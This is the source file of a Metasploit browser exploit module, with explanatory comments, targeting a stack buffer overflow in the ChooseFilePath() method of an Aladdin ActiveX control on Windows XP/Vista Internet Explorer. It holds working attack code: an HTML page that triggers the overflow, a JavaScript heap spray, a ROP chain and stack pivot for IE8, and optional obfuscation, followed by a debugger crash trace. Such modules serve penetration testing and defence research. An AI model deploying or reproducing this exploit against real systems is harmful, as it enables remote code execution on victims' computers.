Path: blob/master/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for the ChooseFilePath() stack buffer overflow in the
# Aladdin Knowledge System ActiveX control (CLSID {09F68A41-2FBE-11D3-8C9D-0008C7D901B6}).
#
# Flow: the BrowserExploitServer mixin serves the HTML built in #exploit_template; that
# page instantiates the control by CLSID, runs the heap spray from #ie_heap_spray and
# calls ChooseFilePath() with an oversized string whose tail is the target's 'Ret' value.
# On the IE 6/7 targets 'Ret' is the spray address 0x0c0c0c0c; on the IE 8 target it is a
# stack-pivot gadget in msvcrt.dll and a ROP chain is prepended to the payload.
#
# Defender notes: the served page is identifiable by the classid attribute and the
# ChooseFilePath call in #exploit_template; the WinDbg trace at the bottom of the file
# shows the first-chance access violations the overflow produces in the browser process.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Registers module metadata, targets and the OBFUSCATE option.
  #
  # @param info [Hash] framework-supplied module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in Aladdin Knowledge System's
          ActiveX component. By supplying a long string of data to the ChooseFilePath()
          function, a buffer overflow occurs, which may result in remote code execution
          under the context of the user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'shinnai', # Vulnerability Discovery
          'b33f', # Original exploit
          'sinn3r', # Metasploit
          'juan vazquez' # Metasploit, IE8 target
        ],
        'References' => [
          [ 'OSVDB', '86723' ],
          [ 'EDB', '22258' ],
          [ 'EDB', '22301' ]
        ],
        'Payload' => {
          'StackAdjustment' => -3500
        },
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
        'Platform' => 'win',
        # Client-side requirements the mixin checks before serving the exploit page;
        # presumably the visiting browser must report this ActiveX CLSID/method and a
        # Windows OS, otherwise it is not served (confirm against BrowserExploitServer).
        'BrowserRequirements' => {
          :source => /script|headers/i,
          :activex => [
            {
              clsid: "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",
              method: "ChooseFilePath"
            }
          ],
          :os_name => OperatingSystems::Match::WINDOWS,
        },
        # Per-target keys consumed below:
        #   'Rop'    -> #exploit_template decides whether to wrap the payload in a ROP chain
        #   'Offset' -> string interpolated into the JavaScript substring() call in #ie_heap_spray
        #   'Ret'    -> appended (little-endian) to the ChooseFilePath argument
        'Targets' => [
          [ 'Automatic', {} ],
          [
            'Windows XP with IE 6',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_XP,
              'ua_name' => 'MSIE',
              'ua_ver' => '6.0',
              'Rop' => false,
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c0c # heap-spray landing address, see #ie_heap_spray
            }
          ],
          [
            'Windows XP with IE 7',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_XP,
              'ua_name' => 'MSIE',
              'ua_ver' => '7.0',
              'Rop' => false,
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c0c
            }
          ],
          [
            'Windows XP with IE 8',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_XP,
              'ua_name' => 'MSIE',
              'ua_ver' => '8.0',
              'Rop' => true,
              'Offset' => '0x5f6',
              'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll
            }
          ],
          [
            'Windows Vista with IE 7',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_VISTA,
              'ua_name' => 'MSIE',
              'ua_ver' => '7.0',
              'Rop' => false,
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c0c
            }
          ]

        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-04-01',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # NOTE(review): the explicit self.class owner argument is the legacy form of
    # register_options; newer modules omit it.
    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class
    )
  end

  # Builds the heapLib-based JavaScript heap spray.
  #
  # The spray blocks are 0x0c bytes (js_nops) around the payload, so the fixed 'Ret'
  # 0x0c0c0c0c used by the non-ROP targets lands inside the sprayed region; the
  # target's 'Offset' string is interpolated verbatim into the substring() call.
  #
  # @param p [String] raw payload bytes (with the ROP chain already prepended when
  #   the target sets 'Rop')
  # @return [String, Rex::Exploitation::JSObfu] spray script, obfuscated when the
  #   OBFUSCATE option is set
  def ie_heap_spray(p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
    js_nops = Rex::Text.to_unescape("\x0c" * 4, Rex::Arch.endian(get_target.arch))
    # Random variable name for the nop string; 1..100 alpha characters.
    randnop = rand_text_alpha(rand(100) + 1)

    # Land the payload at 0x0c0c0c0c

    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var #{randnop} = "#{js_nops}";
    var nops = unescape(#{randnop});
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{get_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    |

    # heaplib() prepends the heapLib helper; obfuscation of that part is disabled here.
    js = heaplib(js, { :noobfu => true })

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      # memory_sensitive keeps the obfuscator from changing string layout the spray relies on.
      js.obfuscate(memory_sensitive: true)
    end

    return js
  end

  # Assembles the HTML page served to the client.
  #
  # @param cli [Object] client connection, forwarded to get_payload
  # @param target_info [Hash] browser details gathered by the mixin
  # @return [Array(String, Binding)] ERB template plus the binding used to expand
  #   <%=spray%> and <%=target_ret%> (presumably rendered by send_exploit_html — confirm)
  def exploit_template(cli, target_info)
    if get_target['Rop']
      # IE8 target: msvcrt-based ROP chain ahead of the payload, entered via the stack pivot in 'Ret'.
      p = generate_rop_payload('msvcrt', get_payload(cli, target_info), { 'target' => 'xp' })
    else
      p = get_payload(cli, target_info)
    end

    spray = ie_heap_spray(p)
    # 'Ret' as little-endian bytes, hex-escaped for embedding in the JavaScript string literal.
    target_ret = Rex::Text.to_hex([get_target.ret].pack("V"))

    # junk is 268 bytes of 0x0c (counter 0..267) followed by the return address.
    html_template = %Q|
    <html>
    <object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>
    <script>
    <%=spray%>
    junk='';
    for( counter=0; counter<=267; counter++) junk+=unescape("%0c");
    pwnd.ChooseFilePath(junk + "<%=target_ret%>");
    </script>
    </html>
    |

    return html_template, binding()
  end

  # Mixin callback: serves the exploit page to a client that met BrowserRequirements.
  #
  # @param cli [Object] client connection
  # @param request [Object] incoming HTTP request (unused here)
  # @param target_info [Hash] browser details gathered by the mixin
  def on_request_exploit(cli, request, target_info)
    print_status("Sending HTML...")
    send_exploit_html(cli, exploit_template(cli, target_info))
  end
end

# WinDbg trace of the crash: the first access violation is in
# OLEAUT32!SysReAllocStringLen dereferencing eax=0c0c0c0c, the second has
# eip=0c0c0c0c, i.e. control transfer into the sprayed region; the db dump shows
# the 0x0c fill on the stack.
=begin
0:008> g
(82c.12dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8
eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
OLEAUT32!SysReAllocStringLen+0x31:
7712a41a 8b00 mov eax,dword ptr [eax] ds:0023:0c0c0c0c=????????
0:008> g
(82c.12dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
0c0c0c0c ?? ???
0:008> db 020bf798
020bf798 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7a8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7b8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7c8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7d8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7e8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7f8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf808 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
=end
